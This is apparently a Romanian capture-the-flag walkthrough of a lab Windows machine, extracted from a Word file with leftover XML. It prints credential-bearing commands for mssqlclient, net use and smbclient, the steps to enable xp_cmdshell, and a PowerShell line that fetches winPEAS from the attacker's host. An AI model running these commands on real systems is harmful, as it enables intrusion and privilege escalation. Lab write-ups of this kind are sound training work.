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Ca de obicei, incepem cu un nmap. Avem din ce vedem o baza de date sql pe portul 1433 si SMB pe portul 445.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-34290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>85090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="23647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Incepem intai cu SMB, sa vedem ce avem disponibil.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smbclient –list=10.129.95.187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589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5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Ok, un backups. Ne conectam prin SMB si luam fila din acel fisier la noi pe masina sa vedem ce avem in ea (intram ca guest, ca sa nu ceara parola).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smbclient //10.129.95.187/backups -U guest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418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4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  <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Cand ne uitam la continut, vedem o parola hardcodata acolo, deci am aflat parola la baza lor de date.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099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putem acum conecta la baza lor de date din terminal. Avem userul in dreptul la User ID.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mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187 -windows-auth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3695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ca nu avem voie sa rulam xp_cmdshell…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Cautam pe net cum il activam.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EXEC sp_configure 'show advanced options', '1'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RECONFIGURE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EXEC sp_configure 'xp_cmdshell', '1'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RECONFIGURE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cand incercam iar sa rulam o comanda, o sa vedem ca merge.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2077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Sa vedem daca putem acum sa realizam ceva privilege excalation.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054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Punem winPEAS la noi pe masina si o hostam cu python. Poate putem sa o instalam remote asa pe masina de windows. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Daca incercam sa o instalam cu curl, o sa vedem ca nu avem voie sa scriem nimic in fiserul de baza, deci il salvam in locul TEMP din enviroment, acolo avand cel mai probabil dreptul de a scrie. Intrebarea e, unde e oare acel temp?</w:t>
        <w:br/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execute xp_cmdshell 'powershell -Command "Invoke-WebRequest -Uri http://10.10.17.159:8080/winPEASany.exe -OutFile $env:TEMP\winPEASany.exe"';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sa vedem pathul la TEMP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execute xp_cmdshell 'echo %TEMP%';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246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 ok, si sa ne asiguram ca exista fisierul in temp.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execute xp_cmdshell 'dir C:\Users\sql_svc\AppData\Local\Temp ';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2946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2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Dap, se vede acolo. Hai sa il rulam.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execute xp_cmdshell '%TEMP%\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>winPEAsany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>.exe &gt; %TEMP%\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>.txt';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Fisierul a fost creat. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Hai sa il analizam.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EXEC xp_cmdshell 'type C:\Users\sql_svc\AppData\Local\Temp\winPEAS.txt';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4922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4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 sa fie viata mai usoara, salvam outputul la noi in clipboard si il punem la noi pe masina. Cautam sa vedem ce am gasit.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Cea mai importanta chestie gasita este urmatoarea chestie:</w:t>
        <w:br/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61595</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>245110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="119316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uitam ce avem in ea.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578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Ok, userul de admin.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net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!  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Hai sa ne conectam prin smb si sa luam flagurile.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smbclient //10.129.95.187/C$ -U administrator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sql_svc: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511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625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administrator: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7696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7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879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5</Pages>
  <Words>353</Words>
  <Characters>1923</Characters>
  <CharactersWithSpaces>2269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2026-06-20T13:43:02Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-20T15:35:45Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>